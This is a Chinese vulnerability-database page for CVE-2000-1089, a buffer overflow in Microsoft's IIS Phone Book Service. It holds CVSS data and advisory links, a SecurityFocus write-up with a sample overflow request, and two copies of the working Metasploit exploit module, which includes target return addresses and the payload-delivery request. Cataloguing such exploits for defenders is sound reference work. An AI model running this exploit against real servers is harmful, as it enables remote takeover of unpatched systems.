CVE-2000-1089
CVSS10.0
发布时间 :2001-01-09 00:00:00
修订时间 :2008-09-05 16:22:37
NMCOEP    

[原文]Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability.


[CNNVD]Microsoft Phone Book Service缓冲区溢出漏洞(CNNVD-200101-026)

        Microsoft Phone Book Service存在缓冲区溢出漏洞。本地用户可以利用该漏洞执行任意命令,也称为"Phone Book Service Buffer Overflow"漏洞。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1089
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1089
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-026
(官方数据源) CNNVD

- 其它链接及资源

http://www.stake.com/research/advisories/2000/a120400-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A120400-1
http://www.securityfocus.com/bid/2048
(VENDOR_ADVISORY)  BID  2048
http://www.microsoft.com/technet/security/bulletin/MS00-094.asp
(VENDOR_ADVISORY)  MS  MS00-094
http://xforce.iss.net/xforce/xfdb/5623
(UNKNOWN)  XF  phone-book-service-bo(5623)

- 漏洞信息

Microsoft Phone Book Service缓冲区溢出漏洞
危急 缓冲区溢出
2001-01-09 00:00:00 2005-10-12 00:00:00
远程  
        Microsoft Phone Book Service存在缓冲区溢出漏洞。本地用户可以利用该漏洞执行任意命令,也称为"Phone Book Service Buffer Overflow"漏洞。

- 公告与补丁

        

- 漏洞信息 (16357)

Microsoft IIS Phone Book Service Overflow (EDBID:16357)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS Phone Book Service Overflow',
			'Description'    => %q{
					This is an exploit for the Phone Book Service /pbserver/pbserver.dll
				described in MS00-094. By sending an overly long URL argument
				for phone book updates, it is possible to overwrite the stack. This
				module has only been tested against Windows 2000 SP1.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2000-1089' ],
					[ 'OSVDB', '463' ],
					[ 'BID', '2048' ],
					[ 'MSB', 'MS00-094' ],
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 896,
					'BadChars' => "\x00\x0a\x0d\x20%&=?",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
					['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
					['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
				],
			'DisclosureDate' => 'Dec 04 2000',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
			], self.class)
	end

	def check
		print_status("Requesting the vulnerable ISAPI path...")
		res = send_request_raw({
			'uri' => datastore['URL']
		}, 5)

		if (res and res.code == 400)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		print_status("Sending overflow...")

		res = send_request_raw({
			'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
		}, 5)

		handler

	end

end
		

- 漏洞信息 (20460)

Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow (EDBID:20460)
windows remote
2000-12-04 Verified
0 Alberto Solino
N/A [点击下载]
source: http://www.securityfocus.com/bid/2048/info

The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default.

A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with those privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5). 

The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/

According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format:



http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pb
ver=&pb=<STRING=db name>

In the DLL checks the total lenght to ensure that request does not exceed
1024 bytes, however it is
possible to overflow a local variable of fixed length in the DLL by sending
a request with
the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars)
HTTP/1.0\n\n

The result is an exception reported in the Event log with source WAM like
the following:

The HTTP server encountered an unhandled exception while processing the
ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B

For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.

By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine. 		

- 漏洞信息 (F83175)

Microsoft IIS Phone Book Service Overflow (PacketStormID:F83175)
2009-11-26 00:00:00
patrick  metasploit.com
exploit
windows,2k
CVE-2000-1089
[点击下载]

This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This Metasploit module has only been tested against Windows 2000 SP1.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS Phone Book Service Overflow',
			'Description'    => %q{
				This is an exploit for the Phone Book Service /pbserver/pbserver.dll
				described in MS00-094. By sending an overly long URL argument
				for phone book updates, it is possible to overwrite the stack. This
				module has only been tested against Windows 2000 SP1.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2000-1089' ],
					[ 'OSVDB', '463' ],
					[ 'BID', '2048' ],
					[ 'MSB', 'MS00-094' ],
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 896,
					'BadChars' => "\x00\x0a\x0d\x20%&=?",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
					['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
					['Windows NT SP6', { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
				],
			'DisclosureDate' => 'Dec 04 2000',
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('URL', [ true,  "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
				], self.class)					
	end

	def check
		print_status("Requesting the vulnerable ISAPI path...")
		res = send_request_raw({
			'uri' => datastore['URL']
		}, 5)		

		if (res and res.code == 400)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		print_status("Sending overflow...")

		res = send_request_raw({
			'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded + [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
		}, 5)

		handler

	end

end
    

- 漏洞信息

463
Microsoft IIS Phone Book Service /pbserver/pbserver.dll Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Unknown Vendor Verified

- 漏洞描述

A remote overflow exists in Microsoft IIS Phone Book Service. The service fails to properly handle URL processing resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2000-12-04 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站